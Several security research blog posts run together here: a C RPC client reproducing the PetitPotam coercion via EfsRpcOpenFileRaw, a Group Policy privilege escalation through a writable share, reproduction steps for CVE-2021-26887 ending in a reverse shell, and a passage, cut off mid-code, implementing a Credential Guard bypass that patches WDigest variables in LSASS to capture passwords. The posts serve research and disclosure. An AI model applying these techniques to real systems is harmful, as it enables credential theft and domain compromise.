long Proc0_EfsRpcOpenFileRaw_Downlevel(
  [out][context_handle] void** arg_1,
  [in][string] wchar_t* arg_2,
  [in]long arg_3);

long Proc1_EfsRpcReadFileRaw_Downlevel(
  [in][context_handle] void* arg_0,
  [out] char* arg_1);

The missing arg_0 argument is precisely the binding handle we need to pass to the RPC runtime. It’s a typical error I’ve encountered numerous times with RpcView. However, I don’t know if it’s a problem with the tool or a misunderstanding on my part.

Another thing that should tip you off is the fact that the EfsRpcOpenFileRaw procedure returns a context handle as an output value ([out][context_handle] void** arg_1). This is a very common thing for RPC servers. They often expose a procedure that takes a binding handle as an input value and yields a context handle that you must use in later RPC calls.

So, let’s fix this and compile the IDL file once again.

long Proc0_EfsRpcOpenFileRaw_Downlevel(
  [in]handle_t arg_0,
  [out][context_handle] void** arg_1,
  [in][string] wchar_t* arg_2,
  [in]long arg_3);

Now, we know that arg_0 is the binding handle. We also know that arg_1 is a reference to the output context handle. Here, we suppose we don't know the details of the context structure, but that's not an issue. We can just pass a reference to an arbitrary void* variable. Then, we don't know what arg_2 and arg_3 are. Since arg_2 is a wchar_t* and the name of the procedure is EfsRpcOpenFileRaw, we can assume that arg_2 is supposed to be a file path. The value of arg_3 is yet to be determined. However, we know that it's a long, so we can arbitrarily set it to 0 and see what happens.

RpcTryExcept
{
    // Invoke remote procedure here
    PVOID pContext;
    LPWSTR pwszFilePath;
    long result;

    pwszFilePath = (LPWSTR)LocalAlloc(LPTR, MAX_PATH * sizeof(WCHAR));
    StringCchPrintf(pwszFilePath, MAX_PATH, L"C:\\Workspace\\foo123.txt");

    wprintf(L"[*] Invoking EfsRpcOpenFileRaw with target path: %ws\r\n", pwszFilePath);
    result = Proc0_EfsRpcOpenFileRaw_Downlevel(Binding, &pContext, pwszFilePath, 0);
    wprintf(L"[*] EfsRpcOpenFileRaw status code: %d\r\n", result);

    LocalFree(pwszFilePath);
}
RpcExcept(EXCEPTION_EXECUTE_HANDLER)
{
    wprintf(L"Exception: %d - 0x%08x\r\n", RpcExceptionCode(), RpcExceptionCode());
}
RpcEndExcept
C:\Workspace\EfsrClient\x64\Release>EfsrClient.exe
[*] RpcStringBindingCompose status code: 0
[*] String binding: ncacn_np:\\\\127.0.0.1[\\pipe\\lsass]
[*] RpcBindingFromStringBinding status code: 0
[*] RpcStringFree status code: 0
[*] Invoking EfsRpcOpenFileRaw with target path: C:\Workspace\foo123.txt
[*] EfsRpcOpenFileRaw status code: 5
[*] RpcBindingFree status code: 0

Running this code, EfsRpcOpenFileRaw fails with the standard Win32 error code 5, which means “Access denied”. This kind of error can be very frustrating because you don’t really know what is going wrong. An “Access denied” error can be returned for a large number of reasons (e.g.: insufficient privileges, wrong combination of parameters, etc.).

Normally, you would have to start reversing the target procedure in order to determine why the server returns this error. However, for the sake of conciseness, I will cheat a bit and just check the documentation. In the documentation of EfsRpcOpenFileRaw, you can read that the third parameter is indeed a “FileName”, but more precisely, it’s an “EFSRPC identifier”. And according to this documentation, “EFSRPC identifiers” are supposed to be UNC paths. So, we can change the following line of code and see if this solves the problem.

StringCchPrintf(pwszFilePath, MAX_PATH, L"\\\\127.0.0.1\\C$\\Workspace\\foo123.txt");

After modifying the code, the server now returns the error code 2, which means “File not found”. That’s a good sign.

C:\Workspace\EfsrClient\x64\Release>EfsrClient.exe
[*] RpcStringBindingCompose status code: 0
[*] String binding: ncacn_np:\\\\127.0.0.1[\\pipe\\lsass]
[*] RpcBindingFromStringBinding status code: 0
[*] RpcStringFree status code: 0
[*] Invoking EfsRpcOpenFileRaw with target path: \\127.0.0.1\C$\Workspace\foo123.txt
[*] EfsRpcOpenFileRaw status code: 2
[*] RpcBindingFree status code: 0

Identifying an Interesting Behavior

With Process Monitor running in the background, we can see that lsass.exe indeed tried to access the file \\127.0.0.1\C$\Workspace\foo123.txt, which does not exist, hence the “File not found” error.

However, if we check the details of the CreateFile operation, we can see that the RPC server is actually impersonating the client. In other words, we could have simply called CreateFile ourselves and the result would have been the same.

What’s interesting though is what happens before lsass.exe tries to access the target file. Indeed, it opens the named pipe \pipe\srvsvc, this time without impersonating the client. If you saw my post about PrintSpoofer, you know that a similar behavior was observed with the Print Spooler server, which tried to open the named pipe \pipe\spoolss.

Of course, the NT AUTHORITY\SYSTEM account cannot be used for network authentication. So, when invoking this procedure with a remote path on a domain-joined machine, Windows will actually use the machine account to authenticate on the remote server. This explains why “PetitPotam” is able to coerce an arbitrary Windows host to authenticate to another machine.

And here is the final code.

#include "efsr_h.h"
#include <iostream>
#include <strsafe.h>

#pragma comment(lib, "RpcRT4.lib")

int wmain(int argc, wchar_t* argv[])
{
    RPC_STATUS status;
    RPC_WSTR StringBinding;
    RPC_BINDING_HANDLE Binding;

    status = RpcStringBindingCompose(
        NULL,                       // Interface's GUID, will be handled by NdrClientCall
        (RPC_WSTR)L"ncacn_np",      // Protocol sequence
        (RPC_WSTR)L"\\\\127.0.0.1", // Network address
        (RPC_WSTR)L"\\pipe\\lsass", // Endpoint
        NULL,                       // No options here
        &StringBinding              // Output string binding
    );

    wprintf(L"[*] RpcStringBindingCompose status code: %d\r\n", status);

    wprintf(L"[*] String binding: %ws\r\n", StringBinding);

    status = RpcBindingFromStringBinding(
        StringBinding,              // Previously created string binding
        &Binding                    // Output binding handle
    );

    wprintf(L"[*] RpcBindingFromStringBinding status code: %d\r\n", status);

    status = RpcStringFree(
        &StringBinding              // Previously created string binding
    );

    wprintf(L"[*] RpcStringFree status code: %d\r\n", status);

    RpcTryExcept
    {
        // Invoke remote procedure here
        PVOID pContext;
        LPWSTR pwszFilePath;
        long result;

        pwszFilePath = (LPWSTR)LocalAlloc(LPTR, MAX_PATH * sizeof(WCHAR));
        //StringCchPrintf(pwszFilePath, MAX_PATH, L"C:\\Workspace\\foo123.txt");
        StringCchPrintf(pwszFilePath, MAX_PATH, L"\\\\127.0.0.1\\C$\\Workspace\\foo123.txt");

        wprintf(L"[*] Invoking EfsRpcOpenFileRaw with target path: %ws\r\n", pwszFilePath);
        result = Proc0_EfsRpcOpenFileRaw_Downlevel(Binding, &pContext, pwszFilePath, 0);
        wprintf(L"[*] EfsRpcOpenFileRaw status code: %d\r\n", result);

        LocalFree(pwszFilePath);
    }
    RpcExcept(EXCEPTION_EXECUTE_HANDLER)
    {
        wprintf(L"Exception: %d - 0x%08x\r\n", RpcExceptionCode(), RpcExceptionCode());
    }
    RpcEndExcept

    status = RpcBindingFree(
        &Binding                    // Reference to the opened binding handle
    );

    wprintf(L"[*] RpcBindingFree status code: %d\r\n", status);
}

void __RPC_FAR* __RPC_USER midl_user_allocate(size_t cBytes)
{
    return((void __RPC_FAR*) malloc(cBytes));
}

void __RPC_USER midl_user_free(void __RPC_FAR* p)
{
    free(p);
}

Conclusion

In this blog post, we saw how it was possible to get all the information we need from RpcView to build a lightweight client application in C/C++. In particular, we saw how we could reproduce the “PetitPotam” trick by invoking the EfsRpcOpenFileRaw procedure of the EFSR interface. I tried to include as much detail as I could, but of course, I cannot cover every aspect of Windows RPC in a single post. If you are interested in Windows RPC, @0xcsandker also wrote an excellent blog post about this subject here: Offensive Windows IPC Internals 2: RPC. His posts are always worth a read as they are thorough and aggregate a lot of information.

I also tried to cover some practical issues and errors you often encounter when implementing an RPC client in C/C++. But again, you will have to deal with a lot of other errors when compiling or invoking remote procedures, if you decide to go this route. Thankfully, a lot of Windows RPC interfaces are documented, such as EFSRPC, so that’s a good starting point.

Finally, implementing an RPC client in C/C++ isn’t necessarily the best approach if you are doing security-oriented research, as this process is rather time-consuming. However, I would still recommend it because it is a good way to learn and get a better understanding of some Windows internals. As an alternative, a more research-oriented approach would consist of using the NtObjectManager module developed by James Forshaw. This module is quite powerful as it allows you to interact with an RPC server in a few lines of PowerShell. As usual, James wrote an excellent article about it here: Calling Local Windows RPC Servers from .NET.

Links & Resources

A not-so-common and stupid privilege escalation

Some time ago, I was doing a Group Policy assessment in order to check for possible misconfigurations. Apart from running the well-known tools, I usually take a look at the shared SYSVOL policy folder. The SYSVOL folder is readable by all domain users and domain computers. My attention was caught at some point by the “Files.xml” files located under a specific user policy:

These policy settings were related to the “Files” preference, part of the Group Policy Preferences running under the user configuration.

According to Microsoft this policy allows you to:

In this case, an exe file (CleanupTask.exe) was copied from a shared folder to a specific location under the “Program Files” folder (the folder names are invented for confidentiality reasons). The “CleanupTask” executable was run by the Windows Task Scheduler every hour under the SYSTEM account.

The first question was: why not run this under the computer configuration? Short answer: only some users had this “custom application” installed and it needed to be replaced, so the policy was filtered for a particular user group, in our case the “CustomApp” group, and luckily my user “user1” was a member of this group.

The policy was executed without impersonating the user (so under the SYSTEM context), otherwise I would have found an entry “userContext=1” in the XML file. This was necessary because a standard user cannot write to %ProgramFiles%.

In addition, the policy was run only once (FilterRunOnce), which prevented multiple copies each time the user logged in.

To sum it up this was the policy configuration from the DC perspective:

Now that I had a clear vision of this policy, I took a look at the shared hidden folder… and guess what? It was writable by domain users, a really dangerous misconfiguration…

I think you already got it: I could place an evil executable (a reverse shell, something adding my user to the local admins, and so on) in this directory, perform a gpupdate /force, which would copy the evil program to “Program Files\CustomApp\Maintenance”, and then wait for the CleanupTask to execute…

But I still had a problem: this policy was applied only once and, in my case, I was already too late… so no way? Not at all. The evidence that the policy has already been executed is stored in a particular location of the Windows Registry, under the “Current User” hive, which we can modify…

All I needed to do was delete the GUID referring to the filter ID of the group policy, run gpupdate /force again, and perform all the nasty things…

Misconfigurations in Group Policies, especially those involving file operations, can be very dangerous, so publish them only after an extremely careful review 😉

Group Policy Folder Redirection CVE-2021-26887

Two years ago (March 2020), I found this sort of “vulnerability” in the Folder Redirection policy and reported it to MSRC. They acknowledged it with CVE-2021-26887, even if they did not really fix the issue (“folder redirection component interacts with the underlying NTFS file system has made this vulnerability particularly challenging to fix”). The proposed solution was reconfiguring Folder Redirection with Offline Files and restricting permissions.

I completely forgot about this case until a few days ago, when I came across my report and decided to publish my findings (don’t expect anything very sophisticated).

There is also an “important” update at the end… so keep on reading 🙂

Summary

If “Folder Redirection” has been enabled via Group Policy and the redirected folders are hosted on a network share, it is possible for a standard user who has access to this file server to access other users’ folders and files (information disclosure) and eventually achieve code execution and privilege escalation.

Prerequisites

  1. A Domain User Group Policy with “Folder Redirection” has to be configured.
  2. A standard local or domain user has to be able to log in on the file server configured with the folder redirection shares (RDP, WinRM, SSH, …)
  3. There have to be domain users who will log on for the first time or will have the folder redirection policy applied for the first time


Steps to reproduce

In this example, I used three VMs:

  1. Windows 2019 Server acting as Domain Controller
  2. Windows 2019 Member Server acting as File Server
  3. Windows 10 domain joined client

On the domain controller, I created a “Folder Redirection” policy. In my example, I’m going to use the “Default Domain Policy” and redirect two folders, the user’s “Documents” and “AppData” folders, to a network share located on server “S01”.

The policy can be found in the SYSVOL share of the DCs:

The folder redirection share is accessible via the network path \\S01\users$. The permissions on this folder have been configured on server “S01” according to the MS documentation: https://docs.microsoft.com/en-us/windows-server/storage/folder-redirection/deploy-folder-redirection

In my case, “S01\Users” is the group to which the policy will be applied, because this group contains the “Domain Users” group too.

Each time a domain user logs in to the domain, the Documents & AppData folders (in this case) are saved on the network share. If it is the first time the user logs in, the necessary directories are created under the share with strict permissions:

One could think of creating the necessary directories before the domain user logs in, granting himself and the domain user full control, and then accessing this private folder and its data afterwards.

This is not possible because, during the first logon, if the folder already exists, a strict check on ownership and permissions is made, and if they don’t match the folder will not be used. (I verified this with “procmon”.)

But if the shared directory has a valid owner and valid permissions, no more permission checks are made during subsequent logins, and this is a potential security issue.

How can I accomplish this? This is what I will do:

As a standard local/domain user, I log in on the server where the shares are hosted (I know, this is not so common…).

I will create a “junction” for a “new” user who has not logged in to the domain yet or has not had the Folder Redirection policy applied. (Finding “new” users is a really easy task for a standard domain user, so I won’t explain it.) In my case, for example, “domainuser3”.

Now I have to wait for domainuser3 to log in from his Windows 10 client (in my case).

The Folder Redirection policy has been applied and permissions are set on the folders.

But as we can see on the fileserver S01, my junction point has been followed too, the real location of the folders is here:

Now, all the malicious user “localuser” has to do is wait for domainuser3 to log off, delete the junction, and create the new folders under the original share:

… and then set the permissions (on Documents & AppData in our case) so that “Everyone” is granted full control:

Given that in my case the “AppData” folder is also redirected, we could place a “malicious” program in the user’s Startup folder which will then be executed at login (for example a reverse shell)

At this point, “localuser” has to wait for the next login of “domainuser3”

And he will get a shell impersonating domainuser3 (imagine if it were a high-privileged user):

Of course, he will be able to access the Documents folder with full control permissions:

Conclusions:

Even if the pre-conditions are not so “common”, this vulnerability could easily lead to information disclosure and EoP.

Update

So far the report. But when I read the mitigations suggested by MS again, something was not so clear. The first time the user logs in, the necessary security checks are performed, so why did they say that it was not possible to fix? All they had to do was perform these checks not only at the first logon, right?

My best guess is that if the profile, or more precisely the registry entry HKLM\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\<user_sid>, is not found, the checks are performed; otherwise they are skipped.

A quick test demonstrated that I was right: after the first logon, I deleted the registry entry and the security checks were performed again.

Maybe the answer is in fdeploy.dll, for example in CEngine::_ProcessFRPolicy; I need to investigate further… or maybe I’m missing something, but this exercise is left to the reader.

That’s all 😉

Revisiting a Credential Guard Bypass

You have probably already heard or read about this clever Credential Guard bypass, which consists of simply patching two global variables in LSASS. All the implementations I have found rely on hardcoded offsets, so I wondered how difficult it would be to retrieve these values at run-time instead.

Background

As a reminder, when (Windows Defender) Credential Guard is enabled on a Windows host, there are two lsass.exe processes, the usual one and one running inside a Hyper-V Virtual Machine. Accessing the juicy stuff in this isolated lsass.exe process therefore means breaking the hypervisor, which is not an easy task.

Source: https://docs.microsoft.com/en-us/windows/security/identity-protection/credential-guard/credential-guard-how-it-works

However, in August 2020, an article was posted on Team Hydra’s blog with the following title: Bypassing Credential Guard. In this post, @N4k3dTurtl3 discussed a very clever and simple trick. In short, the well-known WDigest module (wdigest.dll), which is loaded by LSASS, has two interesting global variables: g_IsCredGuardEnabled and g_fParameter_UseLogonCredential. Their names are rather self-explanatory: the first one holds the state of Credential Guard within the module (is it enabled or not?), the second one determines whether clear-text passwords should be stored in memory. By flipping these two values, you can trick the WDigest module into acting as if Credential Guard were not enabled and as if the system were configured to keep clear-text passwords in memory. Once these two values have been properly patched within the LSASS process, the latter will keep a copy of the users’ passwords when the next authentication occurs. In other words, you won’t be able to access previously stored credentials, but you will be able to extract clear-text passwords afterwards.

The implementation of this technique is rather simple. You first determine the offsets of the two global variables by loading wdigest.dll in a disassembler or a debugger along with the public symbols (the offsets may vary depending on the file version). After that, you just have to find the module’s base address to calculate their absolute address. Once their location is known, the values can be patched and/or restored in the target lsass.exe process.

The original PoC is available here. I found two other projects implementing it: WdToggle (a BOF module for Cobalt Strike) and EDRSandblast. All these implementations rely on hardcoded offsets, but is there a more elegant way? Is it possible to find them at run-time?

We need a plan

If we want to find the offsets of these two variables, we first have to understand how and where they are stored. So let’s fire up Ghidra, import the file C:\Windows\System32\wdigest.dll, load the public symbols, and analyze the whole binary.

Loading the symbols allows us to quickly find these two values from the Symbol Tree. What we learn there is that g_IsCredGuardEnabled and g_fParameter_UseLogonCredential are two 4-byte values (i.e. double words / DWORD values) that are stored in the R/W .data section, nothing surprising about this.

If we take a look at what surrounds these two values, we can see that there is just a bunch of uninitialized data. And even once the module is loaded, there is most probably no particular marker that we will be able to leverage for identifying their location. It is like searching for a needle in a haystack, with the added challenge of not being able to distinguish the needle from the rest of the hay.

So, searching directly in the .data section is definitely not the way to go. There is a better approach: rather than searching for these values, we can search for cross-references! The reason these global variables even exist in the first place is that they are used somewhere in the code. Therefore, if we can find these references, we can also find the variables.

Ghidra conveniently lists all the cross-references in the “Listing” view, so let’s see if there is anything interesting.

Two cross-references immediately stand out - SpAcceptCredentials and SpInitialize - as they are common to both variables. If we can limit the search to a single place, the whole process will certainly be a bit easier. On top of that, looking at these two functions in the symbol tree, we can see that SpInitialize is exported by the DLL, which means that we can easily get its address with a call to GetProcAddress() for instance.

We can go to the “Decompile” view and have a glimpse at how these variables are used within the SpInitialize function.

The RegQueryValueExW call is interesting because the x86 opcode of a function call is rather easy to identify. From there, we could then work backwards and see how the fifth argument is handled. This is a potential avenue to consider so let’s keep it in mind.

That would be a way to identify the g_fParameter_UseLogonCredential variable but what about g_IsCredGuardEnabled? The code from the “Decompile” view is not that easy to interpret as is, so we will have to go a bit deeper.

g_IsCredGuardEnabled = (uint)((*(byte *)(param_2 + 1) & 0x20) != 0);

Here, I found the assembly code to be less confusing.

mov r15,param_2
; ...
test byte ptr [r15 + 0x4],0x20
cmovnz eax,esi
mov dword ptr [g_IsCredGuardEnabled],eax

First, the second parameter of the function call - param_2 - is loaded into the R15 register. Then, the byte at offset 0x04 from this pointer is dereferenced and tested against the bit mask 0x20 (a TEST instruction performs a bitwise AND).

The function SpInitialize is documented here. The documentation tells us that the second parameter is a pointer to a SECPKG_PARAMETERS structure.

NTSTATUS SpInitializeFn(
  [in] ULONG_PTR PackageId,
  [in] PSECPKG_PARAMETERS Parameters,
  [in] PLSA_SECPKG_FUNCTION_TABLE FunctionTable
)

The structure SECPKG_PARAMETERS is documented here. The attribute located at offset 0x04 in the structure (cf. byte ptr [R15 + 0x4]) is MachineState.

typedef struct _SECPKG_PARAMETERS {
  ULONG          Version;
  ULONG          MachineState;
  ULONG          SetupMode;
  PSID           DomainSid;
  UNICODE_STRING DomainName;
  UNICODE_STRING DnsDomainName;
  GUID           DomainGuid;
} SECPKG_PARAMETERS, *PSECPKG_PARAMETERS, SECPKG_EVENT_DOMAIN_CHANGE, *PSECPKG_EVENT_DOMAIN_CHANGE;

The documentation provides a list of possible flags for the MachineState attribute but it does not tell us what flag corresponds to the value 0x20. However it does tell us that the SECPKG_PARAMETERS structure is defined in the header file ntsecpkg.h. If so, we should find it in the Windows SDK, along with the SECPKG_STATE_* flags.

// Values for MachineState

#define SECPKG_STATE_ENCRYPTION_PERMITTED               0x01
#define SECPKG_STATE_STRONG_ENCRYPTION_PERMITTED        0x02
#define SECPKG_STATE_DOMAIN_CONTROLLER                  0x04
#define SECPKG_STATE_WORKSTATION                        0x08
#define SECPKG_STATE_STANDALONE                         0x10
#define SECPKG_STATE_CRED_ISOLATION_ENABLED             0x20
#define SECPKG_STATE_RESERVED_1                   0x80000000

Here we go! The value 0x20 corresponds to the flag SECPKG_STATE_CRED_ISOLATION_ENABLED, which makes quite a lot of sense in our case. In the end, the previous line of C code could simply be rewritten as follows.

g_IsCredGuardEnabled = (param_2->MachineState & SECPKG_STATE_CRED_ISOLATION_ENABLED) != 0;

Note: I could have also helped Ghidra a bit by defining this structure and editing the prototype of the SpInitialize function to achieve a similar result.

That’s all very well, but do we have clear opcode patterns to search for? The answer is “not really”… Prior to the RegQueryValueExW call, a reference to g_fParameter_UseLogonCredential is loaded into RAX; that’s a rather common operation, and we cannot rely on the compiler using the same register every time. After the call to RegQueryValueExW, g_fParameter_UseLogonCredential is set to 0 in an if statement. Again, this is a generic operation, so it is not good enough for establishing a pattern. As for g_IsCredGuardEnabled, there is an interesting set of instructions, but we cannot rely on the compiler producing the same code every time here either.

; Before the call to RegQueryValueExW
; 180003180 48 8d 05 2d 30 03 00
lea     rax,[g_fParameter_UseLogonCredential]
; ...
; 18000318e 48 89 44 24 20
mov     qword ptr [rsp + local_b8],rax=>g_fParameter_UseLogonCredential
; After the call to RegQueryValueExW
; 1800031b1 44 89 25 fc 2f 03 00
mov     dword ptr [g_fParameter_UseLogonCredential],r12d
; Test on param_2->MachineState
; 18000299b 41 f6 47 04 20
test    byte ptr [r15 + 0x4],0x20
; 1800029a0 0f 45 c6
cmovnz  eax,esi
; 1800029a3 89 05 5f 32 03 00
mov     dword ptr [g_IsCredGuardEnabled],eax

We are (almost) back to square one. However, we had a second option - SpAcceptCredentials - so let’s try our luck with this function. As it turns out, the two variables seem to be used in a single if statement as we can see in the “Decompile” view.

The original assembly consists of a CMP instruction, followed by a MOV instruction.

; 180001839 39 1d 75 49 03 00
cmp     dword ptr [g_fParameter_UseLogonCredential],ebx
; 18000183f 8b 05 c3 43 03 00
mov     eax,dword ptr [g_IsCredGuardEnabled]
; 180001845 0f 85 9c 77 00 00
jnz     LAB_180008fe7

Since the public symbols were imported and the PE file was analyzed, Ghidra conveniently displays the references to the variables rather than addresses or offsets. To better understand how this works though, we should have a look at the “raw” assembly code.

cmp    dword ptr [rip + 0x34975],ebx  ; 39 1d 75 49 03 00
mov    eax,dword ptr [rip + 0x343c3]  ; 8b 05 c3 43 03 00
jnz    0x77ae                         ; 0f 85 9c 77 00 00

On the first line, the first byte - 39 - is the opcode of the CMP instruction that compares a 16- or 32-bit register against a value in another register or a memory location. Then, 1d is the ModR/M byte, which encodes the source register (EBX in this case) and a RIP-relative memory operand. Finally, 75 49 03 00 is the little-endian representation of the offset of g_fParameter_UseLogonCredential relative to RIP (rip+0x34975). The second line works pretty much the same way, although it is a MOV instruction.

The third line represents a conditional jump, which won’t help us establish a reliable pattern. If we consider only the first two lines though, we can already build a potential pattern: 39 ?? ?? ?? ?? 00 8b ?? ?? ?? ?? 00. We just make the reasonable assumption that the offsets won’t exceed the value 0x00ffffff.

No need to say that this is not great but there is still room for improvement so let’s test it first and see if it is at least good enough as a starting point. For that matter, Ghidra has a convenient “Search Memory” tool that can be used to search for byte patterns.

To my surprise, this simple pattern yielded only one result in the entire file. Of course, this is not completely conclusive because the PE file also contains uninitialized data that could match this pattern once it is loaded. However, to address this issue, we can simply limit the search to the .text section because it is not subject to modification at run-time.

There is still one last problem. I tested the pattern against a single file. What if this pattern is not generic enough or what if it yields false positives in other versions of wdigest.dll? If only there was an easy way to get my hands on multiple versions of the file to verify that…

And here comes the Windows Binaries Index (or “Winbindex”). This is a nicely designed web application that aggregates all the metadata from update packages released by Microsoft. It also provides a download link whenever the file is available. Kudos to @m417z for this tool; it is a game changer. From the home page, I can simply search for wdigest.dll and virtually get access to any version of the file.

Apart from the version installed in my VM (10.0.19041.388), I tested the above pattern against the oldest (10.0.10240.18638 - Windows 10 1507) and the most recent version I could find (10.0.22000.434 - Windows 11 21H2) and it worked amazingly well in both cases.

It looks like a plan is starting to emerge. In the end, the overall idea is pretty simple. We have to read the DLL, locate the .text section and simply search for our pattern in the raw data. From the matching buffer, we will then be able to extract the variable offsets and adjust them (more on that later).

Practical implementation

Let me quickly recap what we are trying to achieve. We want to read and patch two global variables within the wdigest.dll module. Because of their nature, these two variables are located in the R/W .data section, but they are not easy to locate as they are just simple boolean flags. However, we identified some code in the .text section that references them. So, the idea is to first extract their offsets from the assembly code, and then get the base address of the target module to find their exact location in the lsass.exe process.

Searching for our code pattern

We want to find a portion of the code that matches the pattern 39 ?? ?? ?? ?? 00 8b ?? ?? ?? ?? 00. To do so, we have to first locate the .text section of the wdigest.dll PE file. There are two ways to do this. We can either load the module in the memory of our process or read the file from disk. I decided to go for the second option (for no particular reason).

Locating the .text section is easy. The first bytes of the PE file contain the DOS header, which gives us the offset to the NT headers (e_lfanew). In the NT headers, we find the FileHeader member, which gives us the number of sections (NumberOfSections).

typedef struct _IMAGE_DOS_HEADER {      // DOS .EXE header
    WORD   e_magic;                     // Magic number
    // ...
    LONG   e_lfanew;                    // File address of new exe header
} IMAGE_DOS_HEADER, *PIMAGE_DOS_HEADER;

typedef struct _IMAGE_NT_HEADERS64 {
    DWORD Signature;
    IMAGE_FILE_HEADER FileHeader;
    IMAGE_OPTIONAL_HEADER64 OptionalHeader;
} IMAGE_NT_HEADERS64, *PIMAGE_NT_HEADERS64;

typedef IMAGE_NT_HEADERS64 IMAGE_NT_HEADERS;

typedef struct _IMAGE_FILE_HEADER {
    WORD    Machine;
    WORD    NumberOfSections;
    // ...
} IMAGE_FILE_HEADER, *PIMAGE_FILE_HEADER;

We can then simply iterate the section headers, which are located right after the NT headers, until we find the one named .text.

typedef struct _IMAGE_SECTION_HEADER {
    BYTE    Name[IMAGE_SIZEOF_SHORT_NAME];
    // ...
    DWORD   SizeOfRawData;
    DWORD   PointerToRawData;
    // ...
} IMAGE_SECTION_HEADER, *PIMAGE_SECTION_HEADER;

Once we have identified the section header corresponding to the .text section, we know its size and its offset in the file. With that knowledge, we can invoke SetFilePointer to move the file pointer PointerToRawData bytes from the beginning of the file, and then read SizeOfRawData bytes into a pre-allocated buffer.

// hFile = CreateFileW(L"C:\\Windows\\System32\\wdigest.dll", ...);
DWORD dwBytesRead;
PBYTE pTextSection = (PBYTE)LocalAlloc(LPTR, SectionHeader.SizeOfRawData);
SetFilePointer(hFile, SectionHeader.PointerToRawData, NULL, FILE_BEGIN);
// Note: lpNumberOfBytesRead may only be NULL when an OVERLAPPED structure is supplied.
ReadFile(hFile, pTextSection, SectionHeader.SizeOfRawData, &dwBytesRead, NULL);

Then, it is just a matter of reading the buffer, which I did with a simple loop. When I find the byte 0x39, which is the first byte of the pattern, I simply check the following 11 bytes to see if they also match.

// Pattern: 39 ?? ?? ?? ?? 00 8b ?? ?? ?? ?? 00
j = 0;
while (j + 12 <= SectionHeader.SizeOfRawData) {
  if (pTextSection[j] == 0x39) {
    if ((pTextSection[j + 5] == 0x00) && (pTextSection[j + 6] == 0x8b) && (pTextSection[j + 11] == 0x00)) {
      wprintf(L"Match at offset: 0x%04x\r\n", SectionHeader.VirtualAddress + j);
    }
  }
  j++;
}

However, I do not stop at the first occurrence. As a simple safeguard, I check the entire section and count the number of times the pattern is matched. If this count is 0, obviously this means that the search failed. But if the count is greater than 1, I also consider that it failed. I want to make sure that the pattern matches only once.

Just for testing purposes, and out of curiosity, I also tried several variants of the pattern to get a sense of how efficient it was. Surprisingly, the count dropped very quickly, with only two occurrences for variant #2.

Variant | Pattern                             | Occurrences
--------|-------------------------------------|------------
   1    | 39 .. .. .. .. 00 .. .. .. .. .. .. | 98
   2    | 39 .. .. .. .. 00 8b .. .. .. .. .. | 2
   3    | 39 .. .. .. .. 00 8b .. .. .. .. 00 | 1

If we execute the program, here is what we get so far. We have exactly one match at the offset 0x1839.

C:\Temp>WDigestCredGuardPatch.exe
Exactly one match found, good to go!
Matched code at 0x00001839: 39 1d 75 49 03 00 8b 05 c3 43 03 00

For good measure, we can verify if the offset 0x1839 is correct by going back to Ghidra. And indeed, the code we are interested in starts at 0x180001839.

Note: the value 0x180000000 is the default base address of the PE. This value can be found in NtHeaders.OptionalHeader.ImageBase.

Extracting the variable offsets

Below are the bytes that we were able to extract from the .text section, and their equivalent x86_64 disassembly.

cmp    dword ptr [rip + 0x34975], ebx   ; 39 1D   75 49 03 00
mov    eax, dword ptr [rip + 0x343c3]   ; 8B 05   C3 43 03 00

And here is the thing I intentionally glossed over in the first part. Since I am not used to reading assembly code, these two lines initially puzzled me. I was expecting to find the addresses of the two variables directly in the code but, instead, I found only RIP-relative offsets.

I learned that the x86_64 architecture indeed uses RIP-relative addressing to reference data. As explained in this post, the main advantage of using this kind of addressing is that it produces Position Independent Code (PIC).

The RIP-relative address of g_fParameter_UseLogonCredential is rip+0x34975. We found the code at the address 0x00001839, so the absolute offset of g_fParameter_UseLogonCredential should be 0x00001839 + 0x34975 = 0x361ae, right?

But the offset is actually 0x361b4. Oh, wait… When an instruction is executed, RIP actually already points to the next one. This means that we must add 6, the length of the CMP instruction, to this value: 0x00001839 + 6 + 0x34975 = 0x361b4. Here we go!

We apply the same method to the second variable - g_IsCredGuardEnabled - and we find: 0x00001839 + 6 + 6 + 0x343c3 = 0x35c08.

We identified the 12 bytes of code and we know their offset in the PE, so the implementation is pretty easy. The RIP-relative offsets are stored using the little endian representation, so we can directly copy the four bytes into DWORD temporary variables if we want to interpret them as unsigned long values.

DWORD dwUseLogonCredentialOffset, dwIsCredGuardEnabledOffset;

RtlMoveMemory(&dwUseLogonCredentialOffset, &Code[2], sizeof(dwUseLogonCredentialOffset));
RtlMoveMemory(&dwIsCredGuardEnabledOffset, &Code[8], sizeof(dwIsCredGuardEnabledOffset));
dwUseLogonCredentialOffset += 6 + dwCodeOffset;
dwIsCredGuardEnabledOffset += 6 + 6 + dwCodeOffset;

wprintf(L"Offset of g_fParameter_UseLogonCredential: 0x%08x\r\n", dwUseLogonCredentialOffset);
wprintf(L"Offset of g_IsCredGuardEnabled: 0x%08x\r\n", dwIsCredGuardEnabledOffset);

And here is the result.

C:\Temp>WDigestCredGuardPatch.exe
Exactly one match found, good to go!
Matched code at 0x00001839: 39 1d 75 49 03 00 8b 05 c3 43 03 00
Offset of g_fParameter_UseLogonCredential: 0x000361b4
Offset of g_IsCredGuardEnabled: 0x00035c08

Finding the base address

Now that we know the absolute offsets of the two global variables, we must determine their absolute address in the target process lsass.exe. Of course, this part was already implemented in the original PoC, using the following method:

  1. Open the lsass.exe process with PROCESS_ALL_ACCESS.
  2. List the loaded modules with EnumProcessModules.
  3. For each module, call GetModuleFileNameExA to determine whether it is wdigest.dll.
  4. If so, call GetModuleInformation to get its base address.

Ideally, we would like to interact as little as possible with LSASS but, since we need to patch it anyway, this method works perfectly fine. I just wanted to take this opportunity to present another approach and discuss some aspects of Windows DLLs.

The key thing is that the base address of a module is determined when it is first loaded (with ASLR, it is randomized once per boot). Therefore, any subsequent process loading this module will use the exact same base address. In our case, this means that if we load wdigest.dll in our current process, we will be able to determine its base address without even having to touch LSASS. (I will admit that this sounds a bit dumb because the whole purpose is to eventually patch it.)

Loading a DLL is commonly done through the Windows API LoadLibraryW or LoadLibraryExW. The documentation states that they return “a handle to the module”, but I would say that it is a bit misleading. These functions actually return a HMODULE, which is not a typical kernel object HANDLE. In reality, the HMODULE value is… the base address of the module.

In conclusion, we can get the base address of wdigest.dll in the lsass.exe process simply by running the following code in our own context. One could argue that loading wdigest.dll might look suspicious, but it is nothing compared to patching LSASS anyway so this is not really my concern here.

HMODULE hModule;
if ((hModule = LoadLibraryW(L"wdigest.dll")))
{
